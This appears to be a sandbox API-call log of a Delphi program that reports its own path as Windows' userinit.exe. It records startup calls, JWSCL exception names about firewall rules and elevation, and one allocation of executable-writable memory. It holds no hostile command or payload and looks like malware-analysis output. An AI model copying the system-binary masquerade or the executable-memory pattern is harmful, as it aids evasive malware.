[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff1d, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff1c, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff1b, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff1a, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff19, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff18, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff17, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff16, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff15, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff14, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff13, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff12, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff11, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff10, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff2f, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0100.261] LoadStringA (in: hInstance=0x29e0000, uID=0xff2e, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0100.261] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0100.261] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0100.261] GetVersion () returned 0x1db10106
[0100.261] GetCurrentProcessId () returned 0xf74
[0100.261] GlobalAddAtomA (lpString="Delphi00000F74") returned 0xc14e
[0100.261] GetCurrentThreadId () returned 0xf78
[0100.261] GlobalAddAtomA (lpString="ControlOfs029E000000000F78") returned 0xc147
[0100.261] RegisterClipboardFormatA (lpszFormat="ControlOfs029E000000000F78") returned 0xc168
[0100.261] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0100.261] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0100.261] GetSystemMetrics (nIndex=19) returned 1
[0100.261] GetSystemMetrics (nIndex=75) returned 1
[0100.261] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2b01320, fWinIni=0x0 | out: pvParam=0x2b01320) returned 1
[0100.261] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0100.261] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0100.262] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7ff9) returned 0x201bb
[0100.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0100.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0100.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0100.262] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7ffa) returned 0x201b9
[0100.262] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7ffb) returned 0x201b7
[0100.262] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7ffc) returned 0x201b5
[0100.262] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7ffd) returned 0x201b3
[0100.263] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7fff) returned 0x201b1
[0100.263] LoadCursorA (hInstance=0x29e0000, lpCursorName=0x7ffe) returned 0x201af
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0100.263] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0100.263] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0100.263] GetDC (hWnd=0x0) returned 0x6010890
[0100.263] GetDeviceCaps (hdc=0x6010890, index=90) returned 96
[0100.263] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.264] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0100.264] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2a39a60, dwData=0x2b0156c) returned 1
[0100.264] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x22f53b, fWinIni=0x0 | out: pvParam=0x22f53b) returned 1
[0100.264] CreateFontIndirectA (lplf=0x22f53b) returned 0xf0a0860
[0100.264] GetObjectA (in: h=0xf0a0860, c=60, pv=0x22f32c | out: pv=0x22f32c) returned 60
[0100.264] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x22f3e7, fWinIni=0x0 | out: pvParam=0x22f3e7) returned 1
[0100.264] CreateFontIndirectA (lplf=0x22f4c3) returned 0x570a0888
[0100.264] GetObjectA (in: h=0x570a0888, c=60, pv=0x22f32c | out: pv=0x22f32c) returned 60
[0100.264] CreateFontIndirectA (lplf=0x22f487) returned 0xe0a0889
[0100.264] GetObjectA (in: h=0xe0a0889, c=60, pv=0x22f32c | out: pv=0x22f32c) returned 60
[0100.265] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0100.265] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f49b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.265] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x22f49b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0100.265] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1e0000
[0100.265] GetKeyboardLayoutList (in: nBuff=64, lpList=0x22f41c | out: lpList=0x22f41c) returned 1
[0100.266] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0100.266] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0100.267] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0100.267] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0100.268] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0100.268] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0100.268] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0100.268] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0100.268] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0100.268] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0100.268] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0100.268] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0100.268] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0100.268] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0100.268] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0100.268] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0100.269] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0100.269] LoadStringA (in: hInstance=0x29e0000, uID=0xff59, lpBuffer=0x22f17c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0100.269] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0100.269] LoadStringA (in: hInstance=0x29e0000, uID=0xff5a, lpBuffer=0x22f17c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0100.269] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0100.269] LoadStringA (in: hInstance=0x29e0000, uID=0xff5b, lpBuffer=0x22f17c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0100.269] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0100.269] LoadStringA (in: hInstance=0x29e0000, uID=0xff5c, lpBuffer=0x22f17c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0100.269] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0100.269] SetErrorMode (uMode=0x8000) returned 0x1
[0100.269] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ce90000
[0100.270] SetErrorMode (uMode=0x1) returned 0x8000
[0100.270] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreatePropertyFrame") returned 0x6ce920ea
[0100.270] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreateFontIndirect") returned 0x6ce920b7
[0100.270] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreatePictureIndirect") returned 0x6ce920c8
[0100.270] GetProcAddress (hModule=0x6ce90000, lpProcName="OleLoadPicture") returned 0x6ce920d9
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2acfa98*="EJwsclUnsupportedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2acfa80*="EJwsclPIDException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2acfa68*="EJwsclJwShellExecuteException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2acfa50*="EJwsclShellExecuteException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2acfa38*="EJwsclElevationException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2acfa20*="EJwsclAbortException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2acfa08*="EJwsclSuRunErrorException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2acf9f0*="EJwsclElevateProcessException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2acf9d8*="EJwsclCertApiException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2acf9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2acf9a8*="EJwsclInvalidStartupInfo") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2acf990*="EJwsclFirewallNoExceptionsException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2acf978*="EJwsclFirewallInactiveException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2acf960*="EJwsclFirewallDelRuleException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2acf948*="EJwsclAddUdpPortToFirewallException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2acf930*="EJwsclAddTcpPortToFirewallException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2acf918*="EJwsclFirewallAddRuleException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2acf900*="EJwsclSetRemoteAdminAdressException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2acf8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2acf8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2acf8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2acf8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2acf888*="EJwsclGetIncomingPingAllowedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2acf870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2acf858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0100.271] SysReAllocStringLen (in: pbstr=0x2acf840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2acf840*="EJwsclGetFWStateException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2acf828*="EJwsclSetFWStateException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2acf810*="EJwsclFirewallProfileInitException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2acf7f8*="EJwsclFirewallInitException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2acf7e0*="EJwsclGenericFirewallException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2acf7c8*="EJwsclEnumerateProcessFailed") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2acf7b0*="EJwsclInvalidRegistryPath") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2acf798*="EJwsclEndOfStream") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2acf780*="EJwsclClassTypeMismatch") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2acf768*="EJwsclInvalidHandle") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2acf750*="EJwsclInvalidIndex") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2acf738*="EJwsclInvalidSession") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2acf720*="EJwsclMissingEvent") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2acf708*="EJwsclInvalidPointerType") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2acf6f0*="EJwsclCreateProcessFailed") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2acf6d8*="EJwsclNilPointer") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2acf6c0*="EJwsclUnimplemented") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2acf6a8*="EJwsclInitWellKnownException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2acf690*="EJwsclKeyApiException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2acf678*="EJwsclKeyException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2acf660*="EJwsclHashApiException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2acf648*="EJwsclHashException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2acf630*="EJwsclCSPApiException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2acf618*="EJwsclCSPException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2acf600*="EJwsclTerminalSessionException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2acf5e8*="EJwsclTerminalServiceNecessary") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2acf5d0*="EJwsclTerminalServiceException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2acf5b8*="EJwsclTerminalServerConnectException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2acf5a0*="EJwsclTerminalServerException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2acf588*="EJwsclCryptUnsupportedException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2acf570*="EJwsclCryptApiException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2acf558*="EJwsclCryptException") returned 1
[0100.272] SysReAllocStringLen (in: pbstr=0x2acf540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2acf540*="EJwsclOSError") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2acf528*="EJwsclResourceInitFailed") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2acf510*="EJwsclResourceUnequalCount") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2acf4f8*="EJwsclResourceNotFound") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2acf4e0*="EJwsclResourceException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2acf4c8*="EJwsclFailedAddACE") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2acf4b0*="EJwsclUnsupportedACE") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2acf498*="EJwsclOpenWindowStationException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2acf480*="EJwsclWindowStationException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2acf468*="EJwsclCloseDesktopException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2acf450*="EJwsclCreateDesktopException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2acf438*="EJwsclOpenDesktopException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2acf420*="EJwsclDesktopException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2acf408*="EJwsclSACLAccessDenied") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2acf3f0*="EJwsclAccessDenied") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2acf3d8*="EJwsclLSAException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2acf3c0*="ESetOwnerException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2acf3a8*="ESetSecurityException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2acf390*="EJwsclInvalidParentDescriptor") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2acf378*="EJwsclInvalidKeyPath") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2acf360*="EJwsclInvalidGenericAccessMask") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2acf348*="EJwsclAdaptSecurityInfoException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2acf330*="EJwsclThreadException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2acf318*="EJwsclInvalidObjectException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2acf300*="EJwsclSecurityObjectException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2acf2e8*="EJwsclHashMismatch") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2acf2d0*="EJwsclStreamHashException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2acf2b8*="EJwsclStreamInvalidMagicException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2acf2a0*="EJwsclStreamSizeException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2acf288*="EJwsclStreamException") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2acf270*="EJwsclNoSuchLogonSession") returned 1
[0100.273] SysReAllocStringLen (in: pbstr=0x2acf258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2acf258*="EJwsclInvalidFlagsException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2acf240*="EJwsclProcessNotFound") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2acf228*="EJwsclInvalidParameterException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2acf210*="EJwsclInvalidPathException") returned 1
